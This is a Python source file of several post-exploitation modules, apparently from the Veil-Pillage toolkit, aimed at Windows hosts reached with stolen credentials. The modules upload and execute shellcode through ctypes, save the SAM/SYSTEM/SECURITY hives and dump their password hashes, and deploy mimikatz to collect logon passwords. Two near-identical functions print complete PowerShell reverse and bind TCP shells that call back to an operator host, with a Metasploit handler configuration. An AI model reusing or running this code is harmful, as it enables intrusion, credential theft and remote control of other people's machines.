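        self.output += "[*] 7za.exe and python.zip successfully uploaded " + credTag + target + "\n"

        print(helpers.color(" [*] Triggering 7zip unzip command on " + target))
        command_methods.executeCommand(target, username, password, unzipCommand, triggerMethod)
        self.output += "[*] 7za unzip command triggered " + credTag + target + " with " + triggerMethod + "\n"

        print(helpers.color(" [*] Triggering 'python -c' command on " + target))
        command_methods.executeCommand(target, username, password, pythonCMD, triggerMethod)
        self.output += "[*] 'python -c' inject command triggered " + credTag + target + " with " + triggerMethod + "\n"

        cleanupPrefix = "executeCommand|" + target + "|" + username + "|" + password + "|"
        self.cleanup += cleanupPrefix + killCMD + "|" + triggerMethod + "\n"
        self.cleanup += cleanupPrefix + delCMD + "|" + triggerMethod + "\n"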
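def run(self):
    """Run Veil-Evasion shellcode on each target via an uploaded minimal Python environment.

    Flow per target: upload 7za.exe and python.zip to C:\\Windows\\Temp over
    SMB, unpack with 7za, then execute `python.exe -c` with a ctypes
    cast-and-call of the base64-embedded shellcode using the configured
    trigger method.  Shellcode comes from shellcode.Shellcode() driven by
    self.args (msfpayload/msfoptions or custshell).  When spawn_handler is
    "true" a handler script from helpers.shellcodeToHandler is launched in a
    gnome-terminal tab and the operator is prompted before targets are touched.

    Side effects: status lines in self.output and two cleanup entries per
    target (taskkill python.exe, delete the environment) in self.cleanup, all
    embedding the cleartext password.

    Fix over the original: the custom-handler check used os.path.isdir for a
    resource script; it is os.path.isfile now.  NOTE(review): that branch can
    only run when handlerPath is something other than the hard-coded "none",
    which never happens here; and no delay separates the unzip from the
    inject command.
    """
    handlerPath = "none"

    # assume single set of credentials
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]
    spawnHandler = self.required_options["spawn_handler"][0]

    # nab up some shellcode from Veil-Evasion
    sc = shellcode.Shellcode()
    if self.args.msfpayload:
        sc.SetPayload([self.args.msfpayload, self.args.msfoptions])
    elif self.args.custshell:
        sc.setCustomShellcode(self.args.custshell)

    # base64 our shellcode (string_escape: the generator emits an escaped "\x.." string; Python 2 only)
    b64sc = base64.b64encode(sc.generate().decode("string_escape"))

    # re-print the title and module name after shellcode generation (Veil-Evasion trashes this)
    messages.title()
    sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) + "...")

    terminalCmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '%s'\""

    if spawnHandler.lower() == "true":
        # turn our shellcode object into a handler script
        handlerPath = helpers.shellcodeToHandler(sc)
        if handlerPath != "":
            os.system(terminalCmd % handlerPath)
            raw_input("\n\n [>] Press enter when handler is ready: ")
    elif handlerPath.lower() != "none":
        # a resource script is a regular file, not a directory
        if os.path.isfile(handlerPath):
            os.system(terminalCmd % handlerPath)
            raw_input("\n [>] Press enter when handler is ready: ")
        else:
            print(helpers.color(" [!] Warning: handlerPath '" + handlerPath + "' not valid!"))

    # command to unzip the uploaded python installation (backslashes are doubled
    # because the trigger path unescapes them once more)
    unzipCommand = "C:\\\\Windows\\\\Temp\\\\7za.exe x -y -oC:\\\\Windows\\\\Temp\\\\ C:\\\\Windows\\\\Temp\\\\python.zip"
    zipPath = settings.VEIL_PILLAGE_PATH + "/data/environments/7za.exe"
    pythonPath = settings.VEIL_PILLAGE_PATH + "/data/environments/python.zip"

    # command to invoke shellcode using python
    pythonCMD = "C:\\\\Windows\\\\Temp\\\\python\\\\python.exe -c \"from ctypes import *;a=\\\"%s\\\".decode(\\\"base_64\\\");cast(create_string_buffer(a,len(a)),CFUNCTYPE(c_void_p))()\"" % (b64sc)

    # cleanup -> kill all python processes, then delete the extracted directory,
    # the zipped python environment and 7za.exe
    cleanupCommands = (
        "taskkill /f /im python.exe",
        "rmdir c:\\Windows\\Temp\\Python /s /q & del C:\\Windows\\Temp\\python.zip & del C:\\Windows\\Temp\\7za.exe",
    )

    for target in self.targets:
        creds = "using creds '" + username + ":" + password + "' on " + target

        # upload the 7zip.exe binary and the python install
        uploadResult = smb.uploadFiles(target, username, password, "C$", "\\Windows\\Temp\\", [zipPath, pythonPath])

        if uploadResult == "success":
            self.output += "[*] 7za.exe and python.zip successfully uploaded " + creds + "\n"

            print(helpers.color(" [*] Triggering 7zip unzip command on " + target))
            command_methods.executeCommand(target, username, password, unzipCommand, triggerMethod)
            self.output += "[*] 7za unzip command triggered " + creds + " with " + triggerMethod + "\n"

            print(helpers.color(" [*] Triggering 'python -c' command on " + target))
            command_methods.executeCommand(target, username, password, pythonCMD, triggerMethod)
            self.output += "[*] 'python -c' inject command triggered " + creds + " with " + triggerMethod + "\n"

            for cleanupCMD in cleanupCommands:
                self.cleanup += "|".join(["executeCommand", target, username, password, cleanupCMD, triggerMethod]) + "\n"
        else:
            self.output += "[!] 7za.exe and python.zip unsuccessfully uploaded " + creds + "\n"
            print(helpers.color("[!] 7za.exe and python.zip unsuccessfully uploaded to " + target + "\n", warning=True))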
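def run(self):
    """Dump local account hashes from each target with `reg save` and creddump.

    reg.exe saves the SYSTEM, SECURITY and SAM hives to C:\\Windows\\Temp on
    the target; they are fetched over SMB into /tmp/{system,security,sam}
    (written 0600) and creddump.dump_file_hashes parses SYSTEM+SAM.  Each
    target's hashes are stored with helpers.saveModuleFile and a sorted,
    de-duplicated union of all hashes is appended to self.output at the end.

    A missing SYSTEM or SAM hive fails the target; a missing SECURITY hive is
    only reported, since the dump does not use it.  First credential pair only.

    Side effects: status lines in self.output and a `del` cleanup entry per
    target for the remote hive copies in self.cleanup (both embed the
    cleartext password).  The local /tmp copies are left in place.
    """
    import os

    # assume single set of credentials for this module
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]

    tempDir = "C:\\Windows\\Temp\\"

    # reg.exe command to save off the hives
    regSaveCommand = "reg save HKLM\\SYSTEM C:\\Windows\\Temp\\system /y && reg save HKLM\\SECURITY C:\\Windows\\Temp\\security /y && reg save HKLM\\SAM C:\\Windows\\Temp\\sam /y"
    # the saved hives are the host's credential store; make sure cleanup removes them
    removeHivesCMD = "del C:\\Windows\\Temp\\system C:\\Windows\\Temp\\security C:\\Windows\\Temp\\sam"

    credTag = "using creds '" + username + ":" + password + "' on "

    def fetchHive(target, name):
        # copy one saved hive to /tmp/<name>; returns False when it was empty/missing
        remotePath = tempDir + name
        data = smb.getFile(target, username, password, remotePath, delete=False)
        if data == "":
            # report the remote path (the original printed the empty content instead)
            self.output += "[!] File '" + remotePath + "' from " + target + " empty or doesn't exist\n"
            return False
        # credential material in a world-writable /tmp: 0600 and no symlink following
        flags = os.O_WRONLY | os.O_CREAT | os.O_TRUNC | getattr(os, "O_NOFOLLOW", 0)
        with os.fdopen(os.open("/tmp/" + name, flags, 0o600), "w") as f:
            f.write(data)
        return True

    # let's keep track of ALL hashes found
    collected = []

    for target in self.targets:
        print(helpers.color("\n [*] Dumping hashes on " + target))

        # execute the registry save command and schedule removal of what it wrote
        command_methods.executeCommand(target, username, password, regSaveCommand, triggerMethod)
        self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + removeHivesCMD + "|" + triggerMethod + "\n"

        # sleep for 5 seconds to let everything backup
        time.sleep(5)

        gotSystem = fetchHive(target, "system")
        fetchHive(target, "security")  # not needed by creddump; a miss is only reported
        gotSam = fetchHive(target, "sam")

        if not (gotSystem and gotSam):
            self.output += "[!] Error executing hashdump " + credTag + target + "\n"
            continue

        # get all the hashes from these hives
        hashes = creddump.dump_file_hashes("/tmp/system", "/tmp/sam")
        collected.append(hashes)

        # save off the file to PILLAGE_OUTPUT_PATH/hashdump/target/hashes.txt
        saveLocation = helpers.saveModuleFile(self, target, "hashes.txt", hashes)
        self.output += "[*] dumped hashes (reg.exe) " + credTag + target + " saved to " + saveLocation + "\n"

    allHashes = "".join(collected)
    if allHashes != "":
        # get all non-empty hashes, uniquify and sort them
        unique = sorted(set(line.lower() for line in allHashes.split("\n") if line != ""))
        self.output += "[*] All unique hashes:\n" + "\n".join(unique) + "\n"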
def run(self):
    """Run the "autograb" credential collection against each target.

    Per target the method first decides on a collection path: ``force_method``
    of ``binary`` or ``powershell`` overrides detection; otherwise a small
    PowerShell probe (``$a=42;$a``) is executed via ``wmis`` and PowerShell is
    considered present when it prints ``42``.

    PowerShell path: hosts ``data/misc/autograb.ps1`` and triggers it on the
    target via ``delivery_methods.powershellHostTrigger``, waits ``delay``
    seconds, pulls ``out_file`` over SMB (``delete=True``) and parses it with
    ``helpers.parseMimikatz`` and ``helpers.parseHashdump``.

    Binary path: saves the SYSTEM/SECURITY/SAM hives with ``reg save`` into
    ``C:\\Windows\\Temp`` (fetched with ``delete=False``, so the copies remain
    on the target), parses SYSTEM+SAM locally with ``creddump``, detects the
    architecture via ``%PROCESSOR_ARCHITECTURE%``, then hosts and triggers
    ``data/misc/mimikatz<arch>.exe`` writing to ``out_file``, which is pulled
    and deleted after ``delay`` seconds.

    Side effects: per-target result files via ``helpers.saveModuleFile``,
    operator-side ``/tmp/system``, ``/tmp/security``, ``/tmp/sam`` files that
    are overwritten per target and never removed, and ``self.output`` lines
    that include the username and password in cleartext. Only the first
    credential pair in ``self.creds`` is used. Nothing is returned.
    """
    # assume single set of credentials for this module
    username, password = self.creds[0]

    lhost = self.required_options["lhost"][0]
    use_ssl = self.required_options["use_ssl"][0]
    force_method = self.required_options["force_method"][0]
    delay = self.required_options["delay"][0]
    out_file = self.required_options["out_file"][0]

    # let's keep track of all credentials found
    allhashes, allmsv, allkerberos, allwdigest, alltspkg = [], [], [], [], []

    for target in self.targets:

        powershellInstalled = False

        # check if we're forcing a particular grab method
        if force_method.lower() == "binary":
            powershellInstalled = False
        elif force_method.lower() == "powershell":
            powershellInstalled = True
        else:
            # check if we have a functional Powershell installation
            powershellCommand = "powershell.exe -c \"$a=42;$a\""
            powershellResult = command_methods.executeResult(target, username, password, powershellCommand, "wmis")

            if powershellResult.strip() == "42":
                powershellInstalled = True

        if powershellInstalled:
            # do powersploit combined file of invoke-mimikatz and powerdump
            print helpers.color("\n [*] Powershell installed on " + target)
            self.output += "[*] Powershell installed on " + target + ", using autograb.ps1\n"

            # the temporary output file we will write to
            # (out_file is rebound here, so the prefixed path carries over to later targets)
            if "\\" not in out_file:
                # otherwise assume it's an absolute path
                out_file = "C:\\Windows\\Temp\\" + out_file

            # path to the combined Invoke-Mimikatz/powerdump powershell script
            secondStagePath = settings.VEIL_PILLAGE_PATH + "/data/misc/autograb.ps1"

            # trigger the powershell download on just this target
            delivery_methods.powershellHostTrigger(target, username, password, secondStagePath, lhost, "", triggerMethod="winexe", outFile=out_file, ssl=use_ssl, noArch=True)

            # fixed wait rather than polling for the output file
            print "\n [*] Waiting " + delay + "s for Autograb to run..."
            time.sleep(int(delay))

            # grab the output file and delete it
            out = smb.getFile(target, username, password, out_file, delete=True)

            # save the file off to the appropriate location
            # (saved even when `out` is empty; the failure branch below only changes the log line)
            saveFile = helpers.saveModuleFile(self, target, "autograb.txt", out)

            # parse the mimikatz output and append it to our globals
            (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)
            allmsv.extend(msv1_0)
            allkerberos.extend(kerberos)
            allwdigest.extend(wdigest)
            alltspkg.extend(tspkg)

            # parse the powerdump component
            hashes = helpers.parseHashdump(out)
            allhashes.extend(hashes)

            if out != "":
                self.output += "[*] Autograb.ps1 results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
            else:
                self.output += "[!] Autograb.ps1 failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"

        else:
            # do reg.exe for hashdump and host/execute for mimikatz
            print helpers.color("\n [!] Powershell not installed on " + target, warning=True)
            print helpers.color("\n [*] Using reg.exe save method for hash dumping on " + target)
            self.output += "[!] Powershell not installed on " + target + "\n"

            # reg.exe command to save off the hives
            regSaveCommand = "reg save HKLM\\SYSTEM C:\\Windows\\Temp\\system /y && reg save HKLM\\SECURITY C:\\Windows\\Temp\\security /y && reg save HKLM\\SAM C:\\Windows\\Temp\\sam /y"

            # execute the registry save command
            command_methods.executeCommand(target, username, password, regSaveCommand, "wmis")

            print helpers.color("\n [*] Dumping hashes on " + target)

            # sleep for 5 seconds to let everything backup
            time.sleep(5)

            # grab all of the backed up files
            # delete=False: the hive copies stay behind in C:\Windows\Temp on the target
            systemFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\system", delete=False)
            securityFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\security", delete=False)
            samFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\sam", delete=False)

            # more error-checking here?
            # NOTE(review): unlike the standalone hashdump module there is no error flag;
            # an empty pull is logged but dump_file_hashes below still runs against
            # whatever is currently at /tmp/system and /tmp/sam (possibly a stale copy
            # from an earlier target, or a missing file). The "File ''" messages also
            # interpolate the empty contents rather than the remote path.
            if systemFile == "":
                self.output += "[!] File '" + systemFile + "' from " + target + " empty or doesn't exist\n"
            else:
                f = open('/tmp/system', 'w')
                f.write(systemFile)
                f.close()

            if securityFile == "":
                self.output += "[!] File '" + securityFile + "' from " + target + " empty or doesn't exist\n"
            else:
                f = open('/tmp/security', 'w')
                f.write(securityFile)
                f.close()

            if samFile == "":
                self.output += "[!] File '" + samFile + "' from " + target + " empty or doesn't exist\n"
            else:
                f = open('/tmp/sam', 'w')
                f.write(samFile)
                f.close()

            # get all the hashes from these hives
            out = creddump.dump_file_hashes("/tmp/system", "/tmp/sam")

            # save the output file off
            saveLocation = helpers.saveModuleFile(self, target, "creddump.txt", out)
            self.output += "[*] dumped hashes (reg.exe) using creds '" + username + ":" + password + "' on " + target + " saved to " + saveLocation + "\n"

            # save these off to the universal list
            hashes = helpers.parseHashdump(out)
            allhashes.extend(hashes)

            # now, detect the architecture
            # (any "64" substring in the result selects x64; otherwise x86)
            archCommand = "echo %PROCESSOR_ARCHITECTURE%"
            archResult = command_methods.executeResult(target, username, password, archCommand, "wmis")
            arch = "x86"
            if "64" in archResult:
                arch = "x64"

            # now time for ze mimikatz!
            mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz" + arch + ".exe"

            # the temporary output file we will write to
            if "\\" not in out_file:
                # otherwise assume it's an absolute path
                out_file = "C:\\Windows\\Temp\\" + out_file

            exeArgs = "\"sekurlsa::logonPasswords full\" \"exit\" >" + out_file

            # host mimikatz.exe and trigger it ONLY on this particular machine
            # so we can get the architecture correct
            delivery_methods.hostTrigger(target, username, password, mimikatzPath, lhost, triggerMethod="wmis", exeArgs=exeArgs)

            print "\n [*] Waiting " + delay + "s for Mimikatz to run..."
            time.sleep(int(delay))

            # grab the output file and delete it
            out = smb.getFile(target, username, password, out_file, delete=True)

            # parse the mimikatz output and append it to our globals
            (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)
            allmsv.extend(msv1_0)
            allkerberos.extend(kerberos)
            allwdigest.extend(wdigest)
            alltspkg.extend(tspkg)

            # save the file off to the appropriate location
            saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt", out)

            if out != "":
                self.output += "[*] Mimikatz results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
            else:
                self.output += "[!] Mimikatz failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"

    # summary across all targets: de-duplicate and sort each category
    if len(allhashes) > 0:
        allhashes = sorted(set(allhashes))
        self.output += "[*] All unique hashes:\n\t" + "\n\t".join(allhashes) + "\n"

    if len(allmsv) > 0:
        allmsv = sorted(set(allmsv))
        self.output += "[*] All msv1_0:\n\t" + "\n\t".join(allmsv) + "\n"

    if len(allkerberos) > 0:
        allkerberos = sorted(set(allkerberos))
        self.output += "[*] All kerberos:\n\t" + "\n\t".join(allkerberos) + "\n"

    if len(allwdigest) > 0:
        allwdigest = sorted(set(allwdigest))
        self.output += "[*] All wdigest:\n\t" + "\n\t".join(allwdigest) + "\n"

    if len(alltspkg) > 0:
        alltspkg = sorted(set(alltspkg))
        self.output += "[*] All tspkg:\n\t" + "\n\t".join(alltspkg) + "\n"
def run(self):
    """Launch an in-memory PowerShell cmd.exe shell (reverse or bind TCP) on each target.

    ``shell`` selects which embedded PowerShell script is used: ``rev_tcp``
    connects back to ``lhost``:``lport``; ``bind_tcp`` listens on ``lport``.
    Any other value prints an error, waits for Enter and returns ``""``.
    For ``rev_tcp`` the only validation is that ``lhost`` is not the literal
    string ``"none"``; ``lport`` is not validated in either case.

    For ``rev_tcp`` a Metasploit resource script is always written to
    ``/tmp/handler.rc`` (fixed path, overwritten each run); when
    ``spawn_handler`` is ``"true"`` it is additionally launched through
    ``os.system`` in a new gnome-terminal tab and the method blocks on
    ``raw_input`` until the operator confirms the handler is ready.

    The selected script is encoded with ``helpers.encPowershell`` and run on
    every target via ``command_methods.executeCommand`` with ``trigger_method``.
    Each target gets a ``self.cleanup`` entry whose command is
    ``taskkill /f /im powershell.exe`` -- note this kills every powershell.exe
    on the host, not just the one started here. ``self.output`` and
    ``self.cleanup`` record the username and password in cleartext.
    Only the first credential pair in ``self.creds`` is used.
    """
    # assume single set of credentials
    username, password = self.creds[0]

    triggerMethod = self.required_options["trigger_method"][0]
    shell = self.required_options["shell"][0]
    lhost = self.required_options["lhost"][0]
    lport = self.required_options["lport"][0]
    spawnHandler = self.required_options["spawn_handler"][0]

    # start building the handler in case we want to invoke it
    handler = "use exploit/multi/handler"

    # the pure powershell windows_reverse_tcp shell
    # (template; lhost/lport are substituted with % below)
    revTCPShell = """function cleanup { if ($c.Connected -eq $true) {$c.Close()} if ($p.ExitCode -ne $null) {$p.Close()} exit} $c = New-Object system.net.sockets.tcpclient $c.connect('%s','%s') $stream = $c.GetStream() $n = New-Object System.Byte[] $c.ReceiveBufferSize $p = New-Object System.Diagnostics.Process $p.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe' $p.StartInfo.RedirectStandardInput = 1 $p.StartInfo.RedirectStandardOutput = 1 $p.StartInfo.UseShellExecute = 0 $p.Start() $is = $p.StandardInput $o = $p.StandardOutput Start-Sleep 1 $encoding = new-object System.Text.AsciiEncoding while($o.Peek() -ne -1){$out += $encoding.GetString($o.Read())} $stream.Write($encoding.GetBytes($out),0,$out.Length) $out = $null; $done = $false; while (-not $done) { if ($c.Connected -ne $true) {cleanup} $pos = 0; $i = 1 while (($i -gt 0) -and ($pos -lt $n.Length)) { $read = $stream.Read($n,$pos,$n.Length - $pos) $pos+=$read; if ($pos -and ($n[0..$($pos-1)] -contains 10)) {break}} if ($pos -gt 0) { $string = $encoding.GetString($n,0,$pos) $is.write($string) start-sleep 1 if ($p.ExitCode -ne $null) {cleanup} else { $out = $encoding.GetString($o.Read()) while($o.Peek() -ne -1){ $out += $encoding.GetString($o.Read()); if ($out -eq $string) {$out = ''}} $stream.Write($encoding.GetBytes($out),0,$out.length) $out = $null $string = $null}} else {cleanup}}""" % (lhost, lport)

    # the pure powershell bind_tcp shell (only lport is substituted)
    bindTCPShell = """$en = new-object System.Text.AsciiEncoding $ep = new-object System.Net.IpEndpoint ([System.Net.Ipaddress]::any, "%s") $l = 
new-object System.Net.Sockets.TcpListener $ep $l.start() $socket = $l.AcceptTcpClient() $ns = $socket.GetStream() $nb = New-Object System.Byte[] $socket.ReceiveBufferSize $p = New-Object System.Diagnostics.Process $p.StartInfo.FileName = "C:\\windows\\system32\\cmd.exe" $p.StartInfo.RedirectStandardInput = 1 $p.StartInfo.RedirectStandardOutput = 1 $p.StartInfo.UseShellExecute = 0 $p.Start() $is = $p.StandardInput $os = $p.StandardOutput Start-Sleep 1 while($os.Peek() -ne -1){ $string += $en.GetString($os.Read())} $ns.Write($en.GetBytes($string),0,$string.Length) $string = '' $done = $false while (-not $done) { $pos = 0 $i = 1 while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read = $ns.Read($nb,$pos,$nb.Length - $pos) $pos+=$read if ($pos -and ($nb[0..$($pos-1)] -contains 10)){break}} if ($pos -gt 0) { $string = $en.GetString($nb,0,$pos) $is.write($string) $out = $en.GetString($os.Read()) while($os.Peek() -ne -1){$out += $en.GetString($os.Read())} $ns.Write($en.GetBytes($out),0,$out.length) $out = $null} else {$done = $true}} """ % (lport)

    # if the user specific a reverse_tcp shell
    if shell.lower() == "rev_tcp":

        # make sure we have lhost filled in
        if lhost == "none":
            print helpers.color(" [!] 'lhost' required for rev_tcp! ", warning=True)
            raw_input("\n [>] Press enter to continue: ")
            return ""

        # get the encoded powershell trigger command
        triggerCMD = helpers.encPowershell(revTCPShell)

        handler += "\nset PAYLOAD windows/shell_reverse_tcp"
        handler += "\nset LHOST " + lhost
        handler += "\nset LPORT " + lport
        handler += "\nset ExitOnSession false"
        handler += "\nexploit -j\n"

        # written unconditionally for rev_tcp, even when the handler is not spawned
        f = open('/tmp/handler.rc', 'w')
        f.write(handler)
        f.close()

        # build and spawn a handler for the reverse shell
        if spawnHandler.lower() == "true":
            handlerPath = "/tmp/handler.rc"

            # command to spawn a new tab
            # (handlerPath is the fixed string above, not user input, so the
            #  shell-string construction here is not reached by option values)
            cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""

            # invoke msfconsole with the handler script in a new tab
            os.system(cmd)
            raw_input("\n\n [>] Press enter when handler is ready: ")

    # bind_tco shell is easier :)
    elif shell.lower() == "bind_tcp":
        triggerCMD = helpers.encPowershell(bindTCPShell)

    else:
        print helpers.color("\n [!] Shell not recognized: please enter rev_tcp or bind_tcp\n", warning=True)
        raw_input("\n [>] Press enter to continue: ")
        return ""

    # execute the powershell trigger command on each target
    for target in self.targets:
        # trigger the command and set output as appropriate
        print "\n [*] Triggering powershell shell '" + shell.lower() + "' with lhost=" + lhost + " and lport=" + lport + " on " + target
        self.output += "[*] Triggering powershell shell '" + shell.lower() + "' with lhost=" + lhost + " and lport=" + lport + " using creds '" + username + ":" + password + "' on " + target + "\n"

        command_methods.executeCommand(target, username, password, triggerCMD, triggerMethod)

        # build our cleanup file -> kill all powershell processes
        # (not scoped to the process started here -- every powershell.exe on the host)
        killCMD = "taskkill /f /im powershell.exe"
        self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + killCMD + "|" + triggerMethod + "\n"
def run(self):
    """Launch an in-memory PowerShell cmd.exe shell (reverse or bind TCP) on each target.

    This is functionally the same routine as the other powershell-shell
    ``run`` on this page (differences are whitespace only); see that block's
    comments for the artifact and cleanup notes.

    ``shell`` selects the embedded script: ``rev_tcp`` connects back to
    ``lhost``:``lport``, ``bind_tcp`` listens on ``lport``; anything else
    prints an error, waits for Enter and returns ``""``. ``lhost`` is only
    checked against the literal ``"none"``; ``lport`` is never validated.
    For ``rev_tcp`` a resource script is always written to ``/tmp/handler.rc``
    and, when ``spawn_handler`` is ``"true"``, launched via ``os.system`` in a
    gnome-terminal tab with a blocking ``raw_input`` prompt. Every target gets
    a ``self.cleanup`` entry running ``taskkill /f /im powershell.exe`` (all
    powershell.exe processes on the host). Username and password are recorded
    in cleartext in ``self.output`` and ``self.cleanup``. Only the first
    credential pair in ``self.creds`` is used.
    """
    # assume single set of credentials
    username, password = self.creds[0]

    triggerMethod = self.required_options["trigger_method"][0]
    shell = self.required_options["shell"][0]
    lhost = self.required_options["lhost"][0]
    lport = self.required_options["lport"][0]
    spawnHandler = self.required_options["spawn_handler"][0]

    # start building the handler in case we want to invoke it
    handler = "use exploit/multi/handler"

    # the pure powershell windows_reverse_tcp shell
    # (template; lhost/lport are substituted with % below)
    revTCPShell = """function cleanup { if ($c.Connected -eq $true) {$c.Close()} if ($p.ExitCode -ne $null) {$p.Close()} exit} $c = New-Object system.net.sockets.tcpclient $c.connect('%s','%s') $stream = $c.GetStream() $n = New-Object System.Byte[] $c.ReceiveBufferSize $p = New-Object System.Diagnostics.Process $p.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe' $p.StartInfo.RedirectStandardInput = 1 $p.StartInfo.RedirectStandardOutput = 1 $p.StartInfo.UseShellExecute = 0 $p.Start() $is = $p.StandardInput $o = $p.StandardOutput Start-Sleep 1 $encoding = new-object System.Text.AsciiEncoding while($o.Peek() -ne -1){$out += $encoding.GetString($o.Read())} $stream.Write($encoding.GetBytes($out),0,$out.Length) $out = $null; $done = $false; while (-not $done) { if ($c.Connected -ne $true) {cleanup} $pos = 0; $i = 1 while (($i -gt 0) -and ($pos -lt $n.Length)) { $read = $stream.Read($n,$pos,$n.Length - $pos) $pos+=$read; if ($pos -and ($n[0..$($pos-1)] -contains 10)) {break}} if ($pos -gt 0) { $string = $encoding.GetString($n,0,$pos) $is.write($string) start-sleep 1 if ($p.ExitCode -ne $null) {cleanup} else { $out = $encoding.GetString($o.Read()) while($o.Peek() -ne -1){ $out += $encoding.GetString($o.Read()); if ($out -eq $string) {$out = ''}} $stream.Write($encoding.GetBytes($out),0,$out.length) $out = $null $string = $null}} else {cleanup}}""" %(lhost, lport)

    # the pure powershell bind_tcp shell (only lport is substituted)
    bindTCPShell = """$en = new-object System.Text.AsciiEncoding $ep = new-object System.Net.IpEndpoint ([System.Net.Ipaddress]::any, "%s") $l = 
new-object System.Net.Sockets.TcpListener $ep $l.start() $socket = $l.AcceptTcpClient() $ns = $socket.GetStream() $nb = New-Object System.Byte[] $socket.ReceiveBufferSize $p = New-Object System.Diagnostics.Process $p.StartInfo.FileName = "C:\\windows\\system32\\cmd.exe" $p.StartInfo.RedirectStandardInput = 1 $p.StartInfo.RedirectStandardOutput = 1 $p.StartInfo.UseShellExecute = 0 $p.Start() $is = $p.StandardInput $os = $p.StandardOutput Start-Sleep 1 while($os.Peek() -ne -1){ $string += $en.GetString($os.Read())} $ns.Write($en.GetBytes($string),0,$string.Length) $string = '' $done = $false while (-not $done) { $pos = 0 $i = 1 while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read = $ns.Read($nb,$pos,$nb.Length - $pos) $pos+=$read if ($pos -and ($nb[0..$($pos-1)] -contains 10)){break}} if ($pos -gt 0) { $string = $en.GetString($nb,0,$pos) $is.write($string) $out = $en.GetString($os.Read()) while($os.Peek() -ne -1){$out += $en.GetString($os.Read())} $ns.Write($en.GetBytes($out),0,$out.length) $out = $null} else {$done = $true}} """ %(lport)

    # if the user specific a reverse_tcp shell
    if shell.lower() == "rev_tcp":

        # make sure we have lhost filled in
        if lhost == "none":
            print helpers.color(" [!] 'lhost' required for rev_tcp! ", warning=True)
            raw_input("\n [>] Press enter to continue: ")
            return ""

        # get the encoded powershell trigger command
        triggerCMD = helpers.encPowershell(revTCPShell)

        handler += "\nset PAYLOAD windows/shell_reverse_tcp"
        handler += "\nset LHOST " + lhost
        handler += "\nset LPORT " + lport
        handler += "\nset ExitOnSession false"
        handler += "\nexploit -j\n"

        # written unconditionally for rev_tcp, even when the handler is not spawned
        f = open('/tmp/handler.rc', 'w')
        f.write(handler)
        f.close()

        # build and spawn a handler for the reverse shell
        if spawnHandler.lower() == "true":
            handlerPath = "/tmp/handler.rc"

            # command to spawn a new tab
            # (handlerPath is the fixed string above, not user input, so the
            #  shell-string construction here is not reached by option values)
            cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""

            # invoke msfconsole with the handler script in a new tab
            os.system(cmd)
            raw_input("\n\n [>] Press enter when handler is ready: ")

    # bind_tco shell is easier :)
    elif shell.lower() == "bind_tcp":
        triggerCMD = helpers.encPowershell(bindTCPShell)

    else:
        print helpers.color("\n [!] Shell not recognized: please enter rev_tcp or bind_tcp\n", warning=True)
        raw_input("\n [>] Press enter to continue: ")
        return ""

    # execute the powershell trigger command on each target
    for target in self.targets:
        # trigger the command and set output as appropriate
        print "\n [*] Triggering powershell shell '"+shell.lower()+"' with lhost="+lhost+" and lport="+lport+" on "+target
        self.output += "[*] Triggering powershell shell '"+shell.lower()+"' with lhost="+lhost+" and lport="+lport+" using creds '"+username+":"+password+"' on "+target+"\n"

        command_methods.executeCommand(target, username, password, triggerCMD, triggerMethod)

        # build our cleanup file -> kill all powershell processes
        # (not scoped to the process started here -- every powershell.exe on the host)
        killCMD = "taskkill /f /im powershell.exe"
        self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+killCMD+"|"+triggerMethod+"\n"